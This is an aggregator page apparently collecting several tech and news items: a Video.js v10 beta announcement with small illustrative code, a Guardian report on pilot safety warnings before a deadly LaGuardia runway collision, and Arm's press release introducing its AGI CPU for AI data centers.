You could for sure build that example with an even smaller file size, but it’s meant to show that the player infrastructure is minimal, while supporting much more advanced and custom players.

In v10 we first split State, UI, and Media into their own com­po­nents that work to­gether through API con­tracts in­stead of mono­lithic con­trollers and over­loaded player ob­jects. Each ma­jor com­po­nent is op­tional and eas­ily swap­pable or con­fig­urable. UI and Media com­po­nents can also be used just by them­selves.

The cre­atePlayer func­tion takes an ar­ray of fea­tures (like Zustand store slices) to build up its in­ter­nal state ca­pa­bil­i­ties. If your player does­n’t need au­dio it does­n’t have to bun­dle the code for vol­ume and mute. In legacy play­ers this was­n’t pos­si­ble with­out fork­ing the code.
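
The slice-based composition can be sketched as a toy model. The slice and `createPlayer` shapes below are my own illustration of the Zustand-style pattern described, not the actual v10 signatures.

```javascript
// Feature slices: plain functions that contribute state and methods.
const playbackSlice = (set, get) => ({
  paused: true,
  play: () => set({ paused: false }),
  pause: () => set({ paused: true }),
});

const volumeSlice = (set, get) => ({
  volume: 1,
  muted: false,
  mute: () => set({ muted: true }),
});

// createPlayer merges whichever slices you pass in. A player that never
// imports volumeSlice simply has no volume code in its bundle.
function createPlayer(features) {
  const state = {};
  const set = (patch) => Object.assign(state, patch);
  const get = () => state;
  for (const feature of features) Object.assign(state, feature(set, get));
  return state;
}

const videoOnly = createPlayer([playbackSlice]); // no volume/mute at all
const fullPlayer = createPlayer([playbackSlice, volumeSlice]);

videoOnly.play(); // videoOnly.paused is now false; videoOnly has no mute
```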

Don’t need UI or want to build your own? Just delete the skin, it’s right there in your code. In legacy play­ers, set­ting con­trols=false still re­sults in a bun­dle with all the con­trols. With v10 if you don’t im­port a com­po­nent, it does­n’t ex­ist in your bun­dle.

File size is far from the only important performance metric when it comes to video players, but it’s one that can get away from you quickly if you don’t architect for it upfront. There are still improvements we can make, but we’re really happy with the results of the new architecture so far.

Video.js v10 beta comes with a few pol­ished, com­plete skins (control sets) you can use out of the box. But we hope you don’t stop there be­cause we’ve put a lot of ef­fort into mak­ing the UI com­po­nents them­selves great to work with in any frame­work. We’ve started with React and Web Components, but hope to move quickly into sup­port­ing other pop­u­lar JS frame­works di­rectly.

When you’re ready to go deeper, you can eject any skin and get the full source code in your framework’s language — real components you own and modify, inspired by shadcn/ui. For Beta, “eject” just means copy/paste from the docs, but a fancier CLI option is on the way.

v10’s UI is built with un­styled UI prim­i­tives, in­spired by libs like Base UI and Radix, which means they get out of your way when you’re try­ing to do any­thing cus­tom. Each com­po­nent out­puts a sin­gle HTML el­e­ment, so you have di­rect ac­cess to every­thing hap­pen­ing in the UI.

They’re more verbose, and as a long-time HTML-er I’ll admit I was not a fan at first glance. But after building a player skin with them I understood why this is the way. For example, in the previous version (v8) the timeline thumb/handle was a pseudo-element on a nested child. You overrode it through inspecting the player’s output, using specificity and a font-size for dimensions.

In v10, it’s a real el­e­ment with a class you con­trol.

The pre­vi­ous ver­sion’s de­fault skin is used bil­lions of times every month, and yet we put rel­a­tively lit­tle de­sign ef­fort into it. At the time I hoped devs would style it and make it their own, and then they did­n’t.

For v10, Sam Potts (creator of Plyr, 29,000 GitHub stars largely on the strength of its design) designed the new skins, and will continue to invest in and iterate on them over time. The beta ships two skins: a default skin with a frosted aesthetic and a minimal skin for developers who want a clean starting point, both with refined controls, smooth interactions, and thoughtful animations.

One detail I love is the error dialog, where the visual treatment matches the skin. I’m sure that feels tiny and simple, but in Video.js history this level of detail was so far down the priority list that for a decade the error dialog has been my big ugly text ‘X’, for every skin. So when I see these new error dialogs it helps confirm we’re all setting the bar higher, and I’m loving it.

Amazon.com featuring the version 8 error dialog “X” (I forced the error for the screenshot)

While these beta skins are a great start­ing point, they’re just the be­gin­ning.

If you wanted to build a pod­cast player with Video.js v8, you’d start with a video player, strip out the video-spe­cific parts, add some spe­cific au­dio fea­tures, and then spend real time on UI cus­tomiza­tion to get some­thing that ac­tu­ally looked and felt like a pod­cast player. Same story for a back­ground video on a land­ing page, or a short-form swi­peable player, or a class­room course player.

We do ac­tu­ally know what peo­ple are build­ing, be­lieve it or not. Not just the in­di­vid­ual fea­tures, but the spe­cific com­bi­na­tions that tend to show up to­gether. A TV stream­ing app needs dif­fer­ent things than a hero back­ground video, which needs dif­fer­ent things than a pod­cast player. And those com­bi­na­tions are pretty con­sis­tent across the web.

So in v10 we’re pack­ag­ing them up as pre­sets. A pre­set is a pur­pose-built com­bi­na­tion of skin, fea­tures, and me­dia con­fig­u­ra­tion for a spe­cific use case. Instead of as­sem­bling a player from scratch, you’ll pick the pre­set clos­est to what you’re build­ing and start there.

A de­fault video pre­set (general web­site video, the kind of thing you might oth­er­wise use the HTML video tag for)

A de­fault au­dio pre­set (same idea but for the au­dio tag)

And a back­ground video pre­set. Background video is where this con­cept re­ally starts to click, be­cause a back­ground video needs lay­out but does­n’t need con­trols and does­n’t need au­dio. Rather than hand­ing you a full player and ask­ing you to re­move things, we just give you the right player for the job.
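
Conceptually, a preset is just a named bundle of defaults you can still override. A toy sketch — the preset names, fields, and `fromPreset` helper are all assumptions based on the description above, not the shipped API:

```javascript
// Hypothetical preset registry: skin + features + media configuration.
const presets = {
  video: {
    skin: 'default',
    features: ['playback', 'volume', 'fullscreen'],
    media: { controls: true },
  },
  audio: {
    skin: 'minimal',
    features: ['playback', 'volume'],
    media: { controls: true },
  },
  // Background video: layout, but no controls and no audio features.
  backgroundVideo: {
    skin: null,
    features: ['playback'],
    media: { controls: false, autoplay: true, muted: true, loop: true },
  },
};

// Start from the closest preset, then override anything, which is where
// the compositional foundation described below comes in.
function fromPreset(name, overrides = {}) {
  const base = presets[name];
  return { ...base, ...overrides, media: { ...base.media, ...overrides.media } };
}

const hero = fromPreset('backgroundVideo', { media: { playsInline: true } });
```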

This is also where the com­po­si­tional ar­chi­tec­ture pays off. The pre­set gets you started fast. The com­pos­able foun­da­tion un­der­neath means you can still add, re­move, or re­place any­thing. You get a real start­ing point with­out giv­ing up any of the flex­i­bil­ity.

Over time we’ll ex­pand into more use cases: cre­ator-plat­form play­ers, short-form swi­peable video, ed­u­ca­tional course play­ers. If there’s a use case you’d love to see, let us know.

The last year, and even just the last few months specifically, have been a wild time to be building a new project like this. We’re of course excited for how AI will create interesting interactive player features in the months and years to come, and we have a few ideas of what those will be. For Beta, however, we’ve been focused on the agent experience of building video.js-based players with the help of AI.

* Less-abstracted com­po­nents and un­styled UI prim­i­tives so agents can do more with the code right in your pro­ject and need fewer ex­ter­nal docs

* Markdown ver­sions of every in­di­vid­ual doc. If your agent hits our site with the ac­cept: text/​mark­down header — as many like Claude Code do — we’ll send the mark­down ver­sion of the page, sav­ing your agent loads of un­nec­es­sary con­text bloat.

* A grow­ing set of AI skills in the repo, cur­rently help­ing us build and soon will help you build too.
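
The markdown negotiation in the second bullet boils down to inspecting the `Accept` request header. A minimal sketch of that logic — an illustration of the mechanism, not videojs.org’s actual server code:

```javascript
// Return which representation of a docs page to serve, based on the
// client's Accept header. Quality parameters (;q=...) are ignored here
// for simplicity; a real server would weigh them.
function negotiateDocFormat(acceptHeader = '') {
  const types = acceptHeader
    .split(',')
    .map((t) => t.trim().split(';')[0].toLowerCase());
  return types.includes('text/markdown') ? 'markdown' : 'html';
}

// An agent request (e.g. Claude Code):
negotiateDocFormat('text/markdown, text/html;q=0.9'); // → 'markdown'
// A browser request:
negotiateDocFormat('text/html,application/xhtml+xml'); // → 'html'
```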

In writ­ing this part and get­ting in­put from the team I found we ac­tu­ally have a lot to say about our ex­pe­ri­ence build­ing with AI and the many ways we put it to use, so keep an eye out for a fol­lowup post on that topic.

A few things to know:

* The APIs are not quite sta­ble. This is a beta, so some in­ter­faces will change be­fore GA. Build with it, ex­per­i­ment, give us feed­back, put it on sim­ple pro­jects. It’s not yet the time to do a ma­jor mi­gra­tion.

* The fea­tures may be lim­ited. You might be sur­prised by which fea­tures aren’t sup­ported yet and also by which al­ready are. We are build­ing from a base of four ex­ist­ing play­ers, but our goal for reach­ing beta was sim­ple web­site play­back func­tion­al­ity. It’s ac­ces­si­ble and sup­ports cap­tions, and al­ready works with many for­mats and stream­ing ser­vices, but things like set­tings menus are still on their way.

* We really want your feedback. File issues on GitHub, join the conversation on Discord, tell us what works and what doesn’t. In general, people seem to get less engaged with “JS widgets” like a video player compared to JS frameworks, so please don’t be shy. Your input is really valuable.

If you’re start­ing some­thing new, this is a good time to try v10. Go to videojs.org and check out the in­stal­la­tion guide.

If you’re run­ning a pre­vi­ous ver­sion in pro­duc­tion, sit tight. We’ll have mi­gra­tion guides be­fore we ask you to move.

We’re aim­ing for mid-2026 for GA. Between now and then:

* Feature parity with the capabilities developers rely on in the previous version of Video.js, as well as in Plyr, Vidstack, and Media Chrome.

* Planning ads sup­port later in 2026. Ads are com­pli­cated.

* More player pre­sets for com­mon use cases

@cpilsbury, @decepulis, @esbie, @luwes, @mihar-22, @sampotts for build­ing the thing — who needs AI when you have the ab­solute best team of peo­ple in the world. I’m aware that makes no sense.

That said, @claude. I don’t know if you can hear this yet, but we cer­tainly burned through some to­kens to­gether.

@dhassoun, @essk, @ewelch-mux, @gesinger, @gkatsev, @kixelated, @littlespex, @mister-ben, @misteroneill for be­ing the best ad­vi­sors and in­ter­nal cham­pi­ons a pro­ject could hope for.

My com­pany @muxinc for step­ping in to make sure Video.js still has breath and al­low­ing many of us to spend all our time on it. And @brightcove for keep­ing it breath­ing for so many years be­fore. Our friends at @qualabs for car­ry­ing the load of other pro­jects and giv­ing us time to fo­cus.

I’m very ex­cited for you to fall back in love with your video player ❤️ (This is a theme we’re do­ing. We have cool stick­ers.)

...

Read the original on videojs.org »

7 406 shares, 16 trendiness

So where are all the AI apps? – Answer.AI

...

Read the original on www.answer.ai »

8 370 shares, 16 trendiness

LaGuardia pilots raised safety alarms months before deadly runway crash

Pilot safety con­cerns about New York’s LaGuardia air­port were filed to avi­a­tion of­fi­cials months be­fore Sunday’s col­li­sion be­tween an air­plane and a fire truck left two pi­lots dead and 41 other peo­ple hos­pi­tal­ized.

According to the aviation safety reporting system administered by the US space agency Nasa, a pilot using the airport in the summer wrote, “Please do something,” after air traffic controllers failed to provide appropriate guidance about multiple nearby aircraft.

“The pace of operations is building in LGA,” they wrote, referring to the New York City airport, one of the busiest in the US. “The controllers are pushing the line.”

In a reference to the January 2025 mid-air collision over the Potomac River in Washington DC that killed more than 60 people, they said: “On thunderstorm days, LGA is starting to feel like [Ronald Reagan National airport] did before the accident there.”

The warning, first reported by CNN, showed that the pilot of the aircraft was concerned that LaGuardia’s control tower issued a takeoff clearance for an aircraft when their plane was only 300 feet high on “final” approach on a different runway — and the departing plane had hesitated before initiating its takeoff run.

“I think he or she thought twice before starting their takeoff roll,” the pilot of the aircraft said. The pilot mentioned that thick, smoky haze from wildfires in Canada at the time, as well as a possible helicopter in the area, had convinced him it was “safer to continue the approach and land [about] 10 seconds after the departing aircraft crossed our path”.

Otherwise, the pilot added, he would have been left “suddenly going around and trusting that the helicopter was not near the departure end of 22”, with the number referring to a runway.

The pilot concluded: “the [air traffic control] guidance … does not seem to give guidance on exactly how close aircraft in this situation can get.”

“Based on today’s and close calls I have seen over the years for [runways at the Philadelphia and Newark international airports], it seems to be a [judgment] call by the local controller.”

They also said that a runway lighting system had been turned off. In another report since January 2025, a pilot said their aircraft had been cleared to cross a runway — but “crossing we noticed an aircraft we thought was landing at [runway] 31C seemingly headed for us.”

Air traffic control “should have sent the aircraft around”, they said.

Nasa’s Aviation Safety Reporting System has re­ceived dozens of anony­mous pi­lot com­plaints about safety con­cerns at the small­est of New York’s three lo­cal air­ports.

The reports come as investigators look into Sunday’s collision between landing Air Canada Express flight 646 from Montreal and an airport firetruck that had been cleared to cross the runway, which led to the deaths of pilots MacKenzie Gunther and Antoine Forest as well as injuries to dozens more.

After the air traffic controller cleared the fire truck, which was responding to a plane that had reported difficulties, the controller tried to stop it from crossing. He could later be heard saying on a recording that he had been “dealing with an emergency earlier” and that he “messed up”.

The crash has raised fears that op­er­a­tions at US air­ports are un­der ex­treme stress. Airports have been deal­ing with a short­age of air traf­fic con­trollers, ex­ac­er­bated by bru­tal fed­eral gov­ern­ment per­son­nel cuts by Donald Trump’s ad­min­is­tra­tion at the start of his sec­ond pres­i­dency.

Airports have also grappled with ageing equipment and a shortage of security screeners owing to a partial government shutdown since mid-February, which has caused long security lines and frustration among travelers. More than 450 TSA officers have quit during the partial government shutdown, the Department of Homeland Security said on Tuesday.

“We did not need another aviation tragedy to see this coming,” said aviation expert Brian Fielkow in a comment to the Guardian. An investigation into the collision will take time, he warned, but “let’s stop pretending we don’t understand the conditions in which this is happening.

“We are watching a system under strain. TSA professionals are showing up to work without pay. This creates distraction, instability and unnecessary risk. We are asking people responsible for securing our transportation system to operate under financial and emotional strain and expecting flawless performance. We are managing aviation safety like a political pawn instead of a system that cannot fail.”

Federal in­ves­ti­ga­tors said late on Monday it was too soon to an­swer many ques­tions about Sunday’s deadly ac­ci­dent but promised more in­for­ma­tion would be re­leased Tuesday.

Jennifer Homendy, the National Transportation Safety Board (NTSB) chair whose agency is in­ves­ti­gat­ing Sunday’s crash, said in­ves­ti­ga­tors would an­a­lyze the in­volved air­plane’s cock­pit and flight data recorders, which were re­cov­ered from the wreck un­dam­aged.

She said the runway where the crash happened was likely to be closed for days as investigators sift through “a tremendous amount of debris”.

Homendy also said that an NTSB in­ves­ti­ga­tor sent to LaGuardia on Monday was de­layed for three hours by se­cu­rity lines in Houston.

“Our air traffic control specialist, who was in line … for three hours, until we called … to beg, to see if we can get her through, so we can get her here.

“So it’s been a really big challenge to get the entire team here, and they’re still arriving as we speak,” Homendy added.

The Trump ad­min­is­tra­tion has sent Immigration and Customs Enforcement (ICE) agents to many US air­ports, claim­ing they are there to help with long pre-se­cu­rity lines.

Adam Stahl, the acting TSA deputy administrator, told Fox News that ICE agents would be “conducting non-specialized security support — manning the exit lanes, crowd management, line control … to help alleviate the challenges that our officers are facing”.

Hundreds of Transportation Security Administration (TSA) agents have called in sick or quit their jobs rather than be forced to work without pay amid the shutdown. The shutdown stems from the US Senate not funding the TSA’s parent agency amid a disagreement over immigration enforcement reforms.

Sean Duffy, the US trans­porta­tion sec­re­tary, on Monday de­clined to say how many con­trollers were on duty at LaGuardia when Sunday’s crash hap­pened, de­fer­ring in­stead to the on­go­ing NTSB in­ves­ti­ga­tion.

But he denied rumors that the tower had only one controller on duty. He said LaGuardia was “very well staffed”, with 33 certified controllers and more in training. He said the goal was to have 37 on staff.

Sunday’s in­ci­dent was not the only col­li­sion at LaGuardia in re­cent months. In October, two Delta jets col­lided on a taxi­way, send­ing one per­son to a hos­pi­tal.

In July 2024, a co-pi­lot re­ported a sim­i­lar near-col­li­sion af­ter con­trollers said a plane was cleared to cross the run­way even though an­other air­craft was land­ing at the same time.

“Ground control issued a stop command just in time,” the report entry said.

...

Read the original on www.theguardian.com »

9 361 shares, 17 trendiness

Disruption with some GitHub services

...

Read the original on www.githubstatus.com »

10 355 shares, 17 trendiness

The silicon foundation for the agentic AI cloud era

Today, Arm is an­nounc­ing the Arm AGI CPU, a new class of pro­duc­tion-ready sil­i­con built on the Arm Neoverse plat­form and de­signed to power the next gen­er­a­tion of AI in­fra­struc­ture.

For the first time in our more than 35-year his­tory, Arm is de­liv­er­ing its own sil­i­con prod­ucts — ex­tend­ing the Arm Neoverse plat­form be­yond IP and Arm Compute Subsystems (CSS) to give cus­tomers greater choice in how they de­ploy Arm com­pute — from build­ing cus­tom sil­i­con to in­te­grat­ing plat­form-level so­lu­tions or de­ploy­ing Arm-designed proces­sors. It re­flects both the rapid evo­lu­tion of AI in­fra­struc­ture and grow­ing de­mand from the ecosys­tem for pro­duc­tion-ready Arm plat­forms that can be de­ployed at pace and scale.

AI sys­tems are in­creas­ingly op­er­at­ing con­tin­u­ously at global scale. Historically, the hu­man was the bot­tle­neck in com­put­ing — the pace at which peo­ple could in­ter­act with sys­tems de­fined how quickly work could move through them. In the era of agen­tic AI, that con­straint dis­ap­pears as soft­ware agents co­or­di­nate tasks, in­ter­act with mul­ti­ple mod­els and make de­ci­sions in real time.

As AI sys­tems run con­tin­u­ously and work­loads grow in com­plex­ity, the CPU be­comes the pac­ing el­e­ment of mod­ern in­fra­struc­ture — re­spon­si­ble for keep­ing dis­trib­uted AI sys­tems op­er­at­ing ef­fi­ciently at scale. In a mod­ern-day AI data cen­ter, the CPU man­ages thou­sands of dis­trib­uted tasks — or­ches­trat­ing ac­cel­er­a­tors, man­ag­ing mem­ory and stor­age, sched­ul­ing work­loads and mov­ing data across sys­tems — and now, with agen­tic AI, co­or­di­nat­ing fan-out across large num­bers of agents.

This shift places new de­mands on the CPU and that re­quires an evo­lu­tion of the proces­sor.

Arm Neoverse al­ready un­der­pins many of to­day’s lead­ing hy­per­scale and AI plat­forms, in­clud­ing AWS Graviton, Google Axion, Microsoft Azure Cobalt and NVIDIA Vera. As AI in­fra­struc­ture scales glob­ally, part­ners across the ecosys­tem are ask­ing Arm to do more. The Arm AGI CPU was cre­ated to ad­dress this shift.

Agentic AI work­loads de­mand sus­tained per­for­mance at mas­sive scale. The Arm AGI CPU is de­signed to de­liver high per-task per­for­mance at sus­tained load across thou­sands of cores in par­al­lel — all within the power and cool­ing lim­its of mod­ern data cen­ters.

Every el­e­ment of the Arm AGI CPU — from op­er­at­ing fre­quency to mem­ory and I/O ar­chi­tec­ture — has been de­signed to sup­port mas­sively par­al­lel, high-per­for­mance agen­tic work­loads in a densely pop­u­lated rack de­ploy­ment.

Arm’s ref­er­ence server con­fig­u­ra­tion is a 1OU, 2-node de­sign — pack­ing in two chips with ded­i­cated mem­ory and I/O for a to­tal of 272 cores per blade. These blades are de­signed to fully pop­u­late a stan­dard air-cooled 36kW rack — 30 blades de­liv­er­ing a to­tal of 8160 cores. Arm has ad­di­tion­ally part­nered with Supermicro on a liq­uid-cooled 200kW de­sign ca­pa­ble of hous­ing 336 Arm AGI CPUs for over 45,000 cores.
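
The core counts check out arithmetically. The per-chip figure below is inferred from the two-chip, 272-core blade; everything else comes straight from the configurations above.

```javascript
// Reference server: 1OU blade with 2 chips and 272 cores total.
const coresPerBlade = 272;
const coresPerChip = coresPerBlade / 2; // 136 cores per Arm AGI CPU

// Air-cooled 36 kW rack: 30 blades.
const airCooledCores = 30 * coresPerBlade; // 8160 cores per rack

// Liquid-cooled 200 kW Supermicro design: 336 CPUs.
const liquidCooledCores = 336 * coresPerChip; // 45,696: "over 45,000"
```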

In this con­fig­u­ra­tion, the Arm AGI CPU is ca­pa­ble of de­liv­er­ing more than 2x the per­for­mance per rack com­pared to the lat­est x86 sys­tems*, achieved through the fun­da­men­tal ad­van­tages of the Arm ar­chi­tec­ture and care­ful match­ing of sys­tem re­sources to com­pute:

* The Arm AGI CPU’s class-leading memory bandwidth means more effective threads of execution per rack; x86 CPUs degrade as cores contend under sustained load.

* High per­for­mance, ef­fi­cient, sin­gle-threaded Arm Neoverse V3 CPU cores out­per­form legacy ar­chi­tec­tures; every Arm thread does more work.

* More us­able threads and more work-per-thread com­pounds to mas­sive per­for­mance gains per rack.
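
The compounding in the last bullet is multiplicative: rack throughput is roughly usable threads times work per thread. The individual factors below are illustrative assumptions, not Arm-published figures; the post claims only the roughly 2x rack-level result.

```javascript
// Simple multiplicative model of rack-level throughput.
function rackThroughput(usableThreads, workPerThread) {
  return usableThreads * workPerThread;
}

// Hypothetical factors: 25% more usable threads (less memory contention
// under sustained load) and 60% more work per thread would compound to
// a 2x advantage at the rack level.
const x86 = rackThroughput(1.0, 1.0);
const agi = rackThroughput(1.25, 1.6);
const speedup = agi / x86; // ≈ 2x
```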

The Arm AGI CPU is al­ready see­ing strong com­mer­cial mo­men­tum with part­ners at the fore­front of scal­ing agen­tic AI in­fra­struc­ture. Planned de­ploy­ments span ac­cel­er­a­tor man­age­ment, agen­tic or­ches­tra­tion and the den­si­fi­ca­tion of ser­vices, ap­pli­ca­tions and tools needed for agen­tic task scale-out — as well as in­creased net­work­ing and data plane com­pute to sup­port the AI data cen­ter.

Meta is our lead part­ner and cus­tomer, co-de­vel­op­ing the Arm AGI CPU to op­ti­mize gi­gawatt-scale in­fra­struc­ture for its Meta fam­ily of apps and to work along­side Meta’s own cus­tom MTIA ac­cel­er­a­tors. Other launch part­ners in­clude Cere­bras, Cloudflare, F5, OpenAI, Positron, Rebellions, SAP, and SK Telecom — each work­ing with Arm on the de­ploy­ment of the Arm AGI CPU to ac­cel­er­ate AI-driven ser­vices across cloud, net­work­ing and en­ter­prise en­vi­ron­ments. Commercial sys­tems are now avail­able for or­der from ASRockRack, Lenovo and Supermicro.

To ac­cel­er­ate adop­tion fur­ther, Arm is in­tro­duc­ing the Arm AGI CPU 1OU Dual Node Reference Server, an Open Compute Project (OCP) DC-MHS stan­dard form fac­tor server. Arm plans to con­tribute this ref­er­ence server de­sign and sup­port­ing firmware, along with fur­ther con­tri­bu­tions in­clud­ing sys­tem ar­chi­tec­ture spec­i­fi­ca­tions, de­bug frame­works and di­ag­nos­tic and ver­i­fi­ca­tion tool­ing ap­plic­a­ble to all Arm-based sys­tems. Further de­tails will come at the up­com­ing OCP EMEA Summit.

The launch of Arm AGI CPU rep­re­sents a new chap­ter in Arm’s data cen­ter jour­ney and con­tin­ued lead­er­ship in com­put­ing in­no­va­tion. As AI re­shapes the in­dus­try, Arm re­mains com­mit­ted to en­abling progress across the ecosys­tem — meet­ing cus­tomers where they are, from hy­per­scale cloud providers to AI star­tups.

The Arm AGI CPU is the first of­fer­ing of Arm’s new data cen­ter sil­i­con prod­uct line and is avail­able to or­der now. Follow-on prod­ucts are com­mit­ted, tar­get­ing best-in-class per­for­mance, scale and ef­fi­ciency. This con­tin­ues in par­al­lel with the Arm Neoverse CSS prod­uct roadmap so that all Arm data cen­ter cus­tomers move for­ward to­gether on plat­form ar­chi­tec­ture and soft­ware com­pat­i­bil­ity.

Entering this new chap­ter, our mis­sion re­mains un­changed: to pro­vide the com­pute foun­da­tion that en­ables in­no­va­tion across in­dus­tries. And the ecosys­tem is fully be­hind us: More than 50 lead­ing com­pa­nies across hy­per­scale, cloud, sil­i­con, mem­ory, net­work­ing, soft­ware, sys­tem de­sign and man­u­fac­tur­ing are sup­port­ing the ex­pan­sion of the Arm com­pute plat­form into sil­i­con. With Arm AGI CPU, we are not only defin­ing the ar­chi­tec­ture of the AI-native data cen­ter, we are build­ing it.

Hear more from our Arm AGI CPU de­ploy­ment part­ners:

“At Cerebras we build AI infrastructure designed for ultra-fast, large-scale inference, and as this becomes the dominant workload in AI, composable, high-performance systems matter more than ever — these systems need purpose-built AI acceleration alongside efficient, scalable CPUs orchestrating data movement, networking, and coordination at scale. Extending the Arm compute platform into AGI-class infrastructure is a positive step for the ecosystem and for customers deploying AI at global scale.” — Andrew Feldman, CEO, Cerebras

“To continue our mission of helping build a better Internet, Cloudflare needs infrastructure that scales efficiently across our global network. The Arm AGI CPU provides high-performance, energy-efficient compute designed for the next generation of workloads.” — Stephanie Cohen, Chief Strategy Officer, Cloudflare

“Delivering AI experiences at global scale demands a robust and adaptable portfolio of custom silicon solutions, purpose-built to accelerate AI workloads and optimize performance across Meta’s platforms. We worked alongside Arm to develop the Arm AGI CPU to deploy an efficient compute platform that significantly improves our data center performance density and supports a multi-generation roadmap for our evolving AI systems.” — Santosh Janardhan, Head of Infrastructure, Meta

“OpenAI runs AI systems at massive scale. Hundreds of millions use ChatGPT every day, businesses build on our API, and developers rely on tools like Codex. The Arm AGI CPU will play an important role in our infrastructure as we scale, strengthening the orchestration layer that coordinates large-scale AI workloads and improving efficiency, performance, and bandwidth across the system.” — Sachin Katti, Head of Industrial Compute at OpenAI

“At Positron, we are focused on purpose-built inference accelerators that deliver breakthrough token generation efficiency using commodity memory. Arm has consistently delivered the industry’s most power-efficient compute platforms, which makes the Arm AGI CPU a natural foundation for next-generation AI infrastructure. By combining Positron’s inference acceleration technology with the energy-efficient Arm AGI CPU platform, we see a powerful opportunity to help data center operators deploy frontier AI models at scale with greater performance per watt and per dollar.” — Mitesh Agrawal, CEO, Positron AI

“High-performance AI systems require tight coordination between general-purpose compute and accelerator architectures. By combining the Arm AGI CPU with Rebellions’ NPUs in new high-density server configurations, we’re delivering a scalable, energy-efficient platform that is optimized for AI inference workloads at scale.” — Marshall Choy, Chief Business Officer, Rebellions

“SAP’s successful deployment of SAP HANA on Arm-based AWS Graviton underscores the maturity and performance of the Arm ecosystem for enterprise workloads. The Arm AGI CPU extends that opportunity, providing scalable, efficient compute designed to support the next generation of AI-powered business solutions.” — Stefan Bäuerle, Senior Vice President, Head of HANA & Persistency, SAP

“SK Telecom is expanding into large-scale, full-stack AI inference data center infrastructure, which includes the Arm AGI CPU and Rebellions’ AI accelerator chips. By bringing together our sovereign A.X foundation model with inference-optimized AI servers, we are ready to deliver it to the world while elevating our AIDC competitiveness.” — Suk-geun (SG) Chung, CTO and Head of AI CIC, SK Telecom

This blog post con­tains for­ward-look­ing state­ments re­gard­ing Arm’s prod­uct roadmap, fu­ture per­for­mance, planned con­tri­bu­tions and part­ner de­ploy­ments. These state­ments are based on cur­rent ex­pec­ta­tions and are sub­ject to risks and un­cer­tain­ties that could cause ac­tual re­sults to dif­fer ma­te­ri­ally. For a dis­cus­sion of fac­tors that could af­fect Arm’s re­sults, please re­fer to Arm’s fil­ings with the U. S. Securities and Exchange Commission.

Performance claims are based on Arm in­ter­nal es­ti­mates com­par­ing a fully pop­u­lated rack of Arm AGI CPU-based servers against com­pa­ra­ble x86-based server con­fig­u­ra­tions us­ing in­dus­try-stan­dard work­loads. Actual re­sults may vary based on sys­tem con­fig­u­ra­tion, work­load, and other fac­tors.

All prod­uct and com­pany names are trade­marks or reg­is­tered trade­marks of their re­spec­tive hold­ers.

...

Read the original on newsroom.arm.com »
